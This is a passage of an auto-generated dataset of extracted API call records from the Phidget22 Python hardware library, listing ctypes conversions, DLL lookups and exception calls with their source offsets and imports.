'ctypes.c_int', ([], {}), '()\n', (11856, 11858), False, 'import ctypes\n'), ((12126, 12147), 'ctypes.c_int', 'ctypes.c_int', (['HubPort'], {}), '(HubPort)\n', (12138, 12147), False, 'import ctypes\n'), ((12378, 12392), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (12390, 12392), False, 'import ctypes\n'), ((12676, 12693), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (12691, 12693), False, 'import ctypes\n'), ((12991, 13020), 'ctypes.c_uint32', 'ctypes.c_uint32', (['HubPortSpeed'], {}), '(HubPortSpeed)\n', (13006, 13020), False, 'import ctypes\n'), ((13267, 13284), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (13282, 13284), False, 'import ctypes\n'), ((13599, 13613), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (13611, 13613), False, 
'import ctypes\n'), ((13924, 13938), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (13936, 13938), False, 'import ctypes\n'), ((14219, 14233), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (14231, 14233), False, 'import ctypes\n'), ((14549, 14578), 'ctypes.c_int', 'ctypes.c_int', (['IsHubPortDevice'], {}), '(IsHubPortDevice)\n', (14561, 14578), False, 'import ctypes\n'), ((14815, 14829), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (14827, 14829), False, 'import ctypes\n'), ((15097, 15118), 'ctypes.c_int', 'ctypes.c_int', (['IsLocal'], {}), '(IsLocal)\n', (15109, 15118), False, 'import ctypes\n'), ((15341, 15355), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (15353, 15355), False, 'import ctypes\n'), ((15629, 15651), 'ctypes.c_int', 'ctypes.c_int', (['IsRemote'], {}), '(IsRemote)\n', (15641, 15651), False, 'import ctypes\n'), ((16078, 16102), 'ctypes.c_uint32', 'ctypes.c_uint32', (['timeout'], {}), '(timeout)\n', (16093, 16102), False, 'import ctypes\n'), ((16332, 16349), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (16347, 16349), False, 'import ctypes\n'), ((16665, 16682), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (16680, 16682), False, 'import ctypes\n'), ((16984, 17001), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (16999, 17001), False, 'import ctypes\n'), ((17613, 17630), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (17628, 17630), False, 'import ctypes\n'), ((17944, 17961), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (17959, 17961), False, 'import ctypes\n'), ((18285, 18302), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (18300, 18302), False, 'import ctypes\n'), ((18632, 18646), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (18644, 18646), False, 'import ctypes\n'), ((531, 589), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (549, 589), False, 'import ctypes\n'), ((623, 679), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (639, 679), False, 'import ctypes\n'), ((782, 840), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (800, 840), False, 'import ctypes\n'), ((874, 930), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p)\n', (890, 930), False, 'import ctypes\n'), ((1032, 1125), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_int', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int,\n ctypes.c_char_p)\n', (1050, 1125), False, 'import ctypes\n'), ((1154, 1245), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_int', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int,\n ctypes.c_char_p)\n', (1170, 1245), False, 'import ctypes\n'), ((1350, 1425), 'ctypes.WINFUNCTYPE', 'ctypes.WINFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\n', (1368, 1425), False, 'import ctypes\n'), ((1467, 1540), 'ctypes.CFUNCTYPE', 'ctypes.CFUNCTYPE', (['None', 'ctypes.c_void_p', 'ctypes.c_void_p', 'ctypes.c_char_p'], {}), '(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)\n', (1483, 1540), False, 
'import ctypes\n'), ((2012, 2032), 'ctypes.byref', 'ctypes.byref', (['_value'], {}), '(_value)\n', (2024, 2032), False, 'import ctypes\n'), ((2116, 2139), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (2137, 2139), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((2204, 2229), 'ctypes.byref', 'ctypes.byref', (['self.handle'], {}), '(self.handle)\n', (2216, 2229), False, 'import ctypes\n'), ((2275, 2296), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['res'], {}), '(res)\n', (2291, 2296), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((4806, 4829), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (4827, 4829), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((4934, 4958), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (4950, 4958), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5052, 5075), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5073, 5075), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5154, 5183), 'ctypes.byref', 'ctypes.byref', (['_LibraryVersion'], {}), '(_LibraryVersion)\n', (5166, 5183), False, 'import ctypes\n'), ((5212, 5236), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5228, 5236), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5389, 5412), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5410, 5412), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5497, 5532), 'ctypes.byref', 'ctypes.byref', (['_LibraryVersionNumber'], {}), '(_LibraryVersionNumber)\n', (5509, 5532), False, 'import ctypes\n'), ((5561, 5585), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5577, 5585), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5688, 5711), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5709, 5711), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((5814, 5838), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (5830, 5838), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((5906, 5929), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (5927, 5929), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6015, 6038), 'ctypes.byref', 'ctypes.byref', (['_Attached'], {}), '(_Attached)\n', (6027, 6038), False, 'import ctypes\n'), ((6067, 6091), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6083, 6091), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6182, 6205), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (6203, 6205), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6290, 6312), 'ctypes.byref', 'ctypes.byref', (['_Channel'], {}), '(_Channel)\n', (6302, 6312), False, 'import ctypes\n'), ((6341, 6365), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6357, 6365), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6471, 6494), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 
'PhidgetSupport.getDll', ([], {}), '()\n', (6492, 6494), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6616, 6640), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6632, 6640), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((6716, 6739), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (6737, 6739), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((6829, 6856), 'ctypes.byref', 'ctypes.byref', (['_ChannelClass'], {}), '(_ChannelClass)\n', (6841, 6856), False, 'import ctypes\n'), ((6885, 6909), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (6901, 6909), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7025, 7048), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7046, 7048), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7142, 7173), 'ctypes.byref', 'ctypes.byref', (['_ChannelClassName'], {}), '(_ChannelClassName)\n', (7154, 7173), False, 'import ctypes\n'), ((7202, 7226), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7218, 7226), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7352, 7375), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7373, 7375), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7464, 7490), 'ctypes.byref', 'ctypes.byref', (['_ChannelName'], {}), '(_ChannelName)\n', (7476, 7490), False, 'import ctypes\n'), ((7519, 7543), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7535, 7543), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7669, 7692), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7690, 7692), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((7785, 7815), 'ctypes.byref', 'ctypes.byref', (['_ChannelSubclass'], {}), '(_ChannelSubclass)\n', (7797, 7815), False, 'import ctypes\n'), ((7844, 7868), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (7860, 7868), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((7932, 7955), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (7953, 7955), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8062, 8086), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8078, 8086), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8196, 8219), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8217, 8219), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8321, 8341), 'ctypes.byref', 'ctypes.byref', (['_count'], {}), '(_count)\n', (8333, 8341), False, 'import ctypes\n'), ((8370, 8394), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8386, 8394), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8490, 8513), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8511, 8513), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8602, 8628), 'ctypes.byref', 'ctypes.byref', (['_DeviceClass'], {}), 
'(_DeviceClass)\n', (8614, 8628), False, 'import ctypes\n'), ((8657, 8681), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8673, 8681), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((8794, 8817), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (8815, 8817), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((8910, 8940), 'ctypes.byref', 'ctypes.byref', (['_DeviceClassName'], {}), '(_DeviceClassName)\n', (8922, 8940), False, 'import ctypes\n'), ((8969, 8993), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (8985, 8993), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9109, 9132), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9130, 9132), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9218, 9241), 'ctypes.byref', 'ctypes.byref', (['_DeviceID'], {}), '(_DeviceID)\n', (9230, 9241), False, 'import ctypes\n'), ((9270, 9294), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9286, 9294), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9396, 9419), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9417, 9419), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9508, 9534), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\n', (9520, 9534), False, 'import ctypes\n'), ((9563, 9587), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9579, 9587), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((9760, 9783), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (9781, 9783), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((9872, 9898), 'ctypes.byref', 'ctypes.byref', (['_DeviceLabel'], {}), '(_DeviceLabel)\n', (9884, 9898), False, 'import ctypes\n'), ((9927, 9951), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (9943, 9951), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10026, 10049), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10047, 10049), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10137, 10162), 'ctypes.byref', 'ctypes.byref', (['_DeviceName'], {}), '(_DeviceName)\n', (10149, 10162), False, 'import ctypes\n'), ((10191, 10215), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10207, 10215), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10348, 10371), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10369, 10371), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10467, 10500), 'ctypes.byref', 'ctypes.byref', (['_DeviceSerialNumber'], {}), '(_DeviceSerialNumber)\n', (10479, 10500), False, 'import ctypes\n'), ((10529, 10553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10545, 10553), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10716, 10739), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (10737, 10739), False, 'from 
Phidget22.PhidgetSupport import PhidgetSupport\n'), ((10883, 10907), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (10899, 10907), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((10980, 11003), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11001, 11003), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11090, 11114), 'ctypes.byref', 'ctypes.byref', (['_DeviceSKU'], {}), '(_DeviceSKU)\n', (11102, 11114), False, 'import ctypes\n'), ((11143, 11167), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11159, 11167), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11287, 11310), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11308, 11310), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11401, 11429), 'ctypes.byref', 'ctypes.byref', (['_DeviceVersion'], {}), '(_DeviceVersion)\n', (11413, 11429), False, 'import ctypes\n'), ((11458, 11482), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11474, 11482), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11573, 11596), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11594, 11596), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11677, 11695), 'ctypes.byref', 'ctypes.byref', (['_Hub'], {}), '(_Hub)\n', (11689, 11695), False, 'import ctypes\n'), ((11724, 11748), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (11740, 11748), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((11871, 11894), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (11892, 11894), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((11979, 12001), 'ctypes.byref', 'ctypes.byref', (['_HubPort'], {}), '(_HubPort)\n', (11991, 12001), False, 'import ctypes\n'), ((12030, 12054), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12046, 12054), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12160, 12183), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12181, 12183), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12305, 12329), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12321, 12329), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12405, 12428), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12426, 12428), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12518, 12545), 'ctypes.byref', 'ctypes.byref', (['_HubPortCount'], {}), '(_HubPortCount)\n', (12530, 12545), False, 'import ctypes\n'), ((12574, 12598), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12590, 12598), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((12706, 12729), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (12727, 12729), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((12819, 12846), 'ctypes.byref', 'ctypes.byref', (['_HubPortSpeed'], {}), '(_HubPortSpeed)\n', 
(12831, 12846), False, 'import ctypes\n'), ((12875, 12899), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (12891, 12899), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13033, 13056), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13054, 13056), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13188, 13212), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13204, 13212), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13297, 13320), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13318, 13320), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13413, 13443), 'ctypes.byref', 'ctypes.byref', (['_MaxHubPortSpeed'], {}), '(_MaxHubPortSpeed)\n', (13425, 13443), False, 'import ctypes\n'), ((13472, 13496), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13488, 13496), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13626, 13649), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13647, 13649), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((13750, 13788), 'ctypes.byref', 'ctypes.byref', (['_HubPortSupportsSetSpeed'], {}), '(_HubPortSupportsSetSpeed)\n', (13762, 13788), False, 'import ctypes\n'), ((13817, 13841), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (13833, 13841), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((13951, 13974), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (13972, 13974), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14061, 14085), 'ctypes.byref', 'ctypes.byref', (['_IsChannel'], {}), '(_IsChannel)\n', (14073, 14085), False, 'import ctypes\n'), ((14114, 14138), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14130, 14138), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14246, 14269), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14267, 14269), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14362, 14392), 'ctypes.byref', 'ctypes.byref', (['_IsHubPortDevice'], {}), '(_IsHubPortDevice)\n', (14374, 14392), False, 'import ctypes\n'), ((14421, 14445), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14437, 14445), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14591, 14614), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14612, 14614), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14752, 14776), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (14768, 14776), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((14842, 14865), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (14863, 14865), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((14950, 14972), 'ctypes.byref', 'ctypes.byref', (['_IsLocal'], {}), '(_IsLocal)\n', (14962, 14972), False, 'import ctypes\n'), ((15001, 15025), 
'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15017, 15025), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15131, 15154), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15152, 15154), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15276, 15300), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15292, 15300), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15368, 15391), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15389, 15391), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15477, 15500), 'ctypes.byref', 'ctypes.byref', (['_IsRemote'], {}), '(_IsRemote)\n', (15489, 15500), False, 'import ctypes\n'), ((15529, 15553), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15545, 15553), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15664, 15687), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15685, 15687), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15811, 15835), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (15827, 15835), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((15866, 15889), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (15887, 15889), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((15995, 16019), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16011, 16019), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16115, 16138), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16136, 16138), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16271, 16295), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16287, 16295), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16362, 16385), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16383, 16385), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16469, 16490), 'ctypes.byref', 'ctypes.byref', (['_Parent'], {}), '(_Parent)\n', (16481, 16490), False, 'import ctypes\n'), ((16519, 16543), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16535, 16543), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((16695, 16718), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (16716, 16718), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((16810, 16839), 'ctypes.byref', 'ctypes.byref', (['_ServerHostname'], {}), '(_ServerHostname)\n', (16822, 16839), False, 'import ctypes\n'), ((16868, 16892), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (16884, 16892), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17014, 17037), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17035, 17037), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17125, 17150), 'ctypes.byref', 
'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\n', (17137, 17150), False, 'import ctypes\n'), ((17179, 17203), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17195, 17203), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17371, 17394), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17392, 17394), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17482, 17507), 'ctypes.byref', 'ctypes.byref', (['_ServerName'], {}), '(_ServerName)\n', (17494, 17507), False, 'import ctypes\n'), ((17536, 17560), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17552, 17560), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17643, 17666), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17664, 17666), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((17758, 17787), 'ctypes.byref', 'ctypes.byref', (['_ServerPeerName'], {}), '(_ServerPeerName)\n', (17770, 17787), False, 'import ctypes\n'), ((17816, 17840), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (17832, 17840), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((17974, 17997), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (17995, 17997), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18091, 18122), 'ctypes.byref', 'ctypes.byref', (['_ServerUniqueName'], {}), '(_ServerUniqueName)\n', (18103, 18122), False, 'import ctypes\n'), ((18151, 18175), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18167, 18175), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((18315, 18338), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (18336, 18338), False, 'from Phidget22.PhidgetSupport import PhidgetSupport\n'), ((18434, 18467), 'ctypes.byref', 'ctypes.byref', (['_MaxVINTDeviceSpeed'], {}), '(_MaxVINTDeviceSpeed)\n', (18446, 18467), False, 'import ctypes\n'), ((18496, 18520), 'Phidget22.PhidgetException.PhidgetException', 'PhidgetException', (['result'], {}), '(result)\n', (18512, 18520), False, 'from Phidget22.PhidgetException import PhidgetException\n'), ((18659, 18682), 'Phidget22.PhidgetSupport.PhidgetSupport.getDll', 'PhidgetSupport.getDll', ([], {}), '()\n', (18680, 18682), False, 'from 